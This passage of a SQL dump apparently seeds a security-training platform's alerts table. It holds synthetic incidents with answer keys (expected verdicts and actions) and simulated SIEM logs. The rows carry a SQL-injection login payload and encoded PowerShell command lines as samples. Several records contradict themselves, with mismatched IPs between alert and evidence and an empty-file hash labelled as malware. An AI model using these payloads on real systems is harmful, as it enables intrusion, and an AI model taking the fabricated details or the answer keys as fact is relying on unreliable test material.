2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"confidential_gov_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration Policy\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"ALERT-20231015-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.584Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"confidential_gov_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration Policy\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"ALERT-20231015-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.584Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"confidential_gov_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration Policy\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"ALERT-20231015-0001\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1248, 'Malicious Command Execution Detected', 'high', 'Velociraptor', 'A suspicious PowerShell script was executed on an internal server, indicating potential malware deployment. The script was executed from an unknown external IP address.', 'Malware', 'T1059', 1, 'investigating', 277, '{\"timestamp\":\"2026-02-14T08:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin_user\",\"hostname\":\"Server01\",\"command_line\":\"powershell.exe -EncodedCommand aQBlAHgAIAAtAHIAIAAtAGoAbgB1AGsAbwB3AG4A\"}', '2026-02-14 17:16:52', '2026-03-11 11:48:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Privileged user account accessed\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand aQBlAHgAIAAtAHIAIAAtAGoAbgB1AGsAbwB3AG4A\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of malware\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The external IP address and the encoded PowerShell command are indicative of a malware attack. Immediate isolation and forensic analysis are required.\"}', 'Intermediate', 'IR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T08:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"Server01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aQBlAHgAIAAtAHIAIAAtAGoAbgB1AGsAbwB3AG4A\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T08:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"Server01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aQBlAHgAIAAtAHIAIAAtAGoAbgB1AGsAbwB3AG4A\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T08:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"Server01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aQBlAHgAIAAtAHIAIAAtAGoAbgB1AGsAbwB3AG4A\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T08:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"Server01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aQBlAHgAIAAtAHIAIAAtAGoAbgB1AGsAbwB3AG4A\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T08:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"Server01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aQBlAHgAIAAtAHIAIAAtAGoAbgB1AGsAbwB3AG4A\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1249, 'SQL Injection Attack Detected on Public Web Application', 'critical', 'KAPE', 'A SQL injection attack was detected targeting a public-facing web application. The payload was crafted to extract sensitive database information.', 'Web Attack', 'T1190', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T10:15:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.22\",\"dst_ip\":\"203.0.113.10\",\"username\":\"web_user\",\"hostname\":\"WebServer01\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-02-14 17:16:52', '2026-02-16 17:42:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple web attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Public-facing web server IP address\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The SQL injection payload is a classic attack vector aiming to bypass authentication or extract database information. Blocking the attacker IP and securing the web application is critical.\"}', 'Intermediate', 'IR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.727Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"web_user\\\",\\\"hostname\\\":\\\"WebServer01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.727Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"web_user\\\",\\\"hostname\\\":\\\"WebServer01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.727Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"web_user\\\",\\\"hostname\\\":\\\"WebServer01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.727Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"web_user\\\",\\\"hostname\\\":\\\"WebServer01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.727Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"web_user\\\",\\\"hostname\\\":\\\"WebServer01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1250, 'AWS GuardDuty: Suspicious Failed Login Attempts Detected', 'high', 'AWS GuardDuty', 'Multiple failed login attempts detected from an external IP known for brute force attacks targeting IAM user accounts.', 'Brute Force', 'T1110', 0, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T09:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.100\",\"username\":\"jdoe\",\"hostname\":\"aws-ec2-instance\",\"failed_attempts\":25}', '2026-02-14 17:37:37', '2026-02-16 17:11:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IAM user account targeted in brute force attack\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted AWS instance\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated failed login attempts from a known malicious IP indicate a brute force attack on AWS IAM user accounts.\"}', 'Novice', 'CLOUD', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.729Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-15T12:46:56.729Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-15T12:45:56.729Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-15T12:44:56.729Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-15T12:43:56.729Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1251, 'Prisma Cloud: Malware Detected in Kubernetes Pod', 'critical', 'Prisma Cloud', 'Malware signature detected in a Kubernetes pod on the cluster, indicating an attempted compromise by a known threat.', 'Malware', 'T1059', 0, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T12:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"hostname\":\"k8s-node-1\",\"command_line\":\"/tmp/malicious_executable\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-02-14 17:37:37', '2026-02-15 12:47:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 60+ antivirus engines as malicious\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in distribution of malware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"/tmp/malicious_executable\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable associated with known malware campaigns\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detection of a known malware hash in the Kubernetes environment suggests a successful infiltration attempt requiring immediate containment and analysis.\"}', 'Novice', 'CLOUD', 1, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.730Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T12:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"k8s-node-1\\\",\\\"command_line\\\":\\\"/tmp/malicious_executable\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.730Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T12:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"k8s-node-1\\\",\\\"command_line\\\":\\\"/tmp/malicious_executable\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.730Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T12:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"k8s-node-1\\\",\\\"command_line\\\":\\\"/tmp/malicious_executable\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.730Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T12:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"k8s-node-1\\\",\\\"command_line\\\":\\\"/tmp/malicious_executable\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.730Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T12:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"k8s-node-1\\\",\\\"command_line\\\":\\\"/tmp/malicious_executable\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1252, 'Detected Brute Force Attack on External SSH Service', 'high', 'Splunk', 'Multiple failed login attempts detected from a foreign IP targeting SSH service on an internal server.', 'Brute Force', 'T1110', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T02:34:56Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"internal-ssh-server\",\"failed_attempts\":35}', '2026-02-14 12:15:28', '2026-02-19 15:19:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed attempts from a suspicious foreign IP indicates a brute force attack.\"}', 'Intermediate', 'IR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.732Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T02:34:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-ssh-server\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-15T12:46:56.732Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T02:34:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-ssh-server\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-15T12:45:56.732Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T02:34:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-ssh-server\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-15T12:44:56.732Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T02:34:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-ssh-server\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-15T12:43:56.732Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T02:34:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-ssh-server\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1253, 'Suspicious PowerShell Script Execution Detected', 'medium', 'Velociraptor', 'A PowerShell script with a potentially malicious command was executed on an internal host.', 'Malware', 'T1059', 0, 'investigating', NULL, '{\"timestamp\":\"2026-02-14T05:22:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.12\",\"hostname\":\"workstation01\",\"command_line\":\"powershell.exe -EncodedCommand JABhAGwAdABlAHIAdAAgACgAJwBzAG8AbQBlAC4AcwB1AHMAcABlAGMAdABlAHQAcgBlAGcAHwAnACkA\"}', '2026-02-14 17:33:14', '2026-03-11 12:24:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand JABhAGwAdABlAHIAdAAgACgAJwBzAG8AbQBlAC4AcwB1AHMAcABlAGMAdABlAHQAcgBlAGcAHwAnACkA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encoded 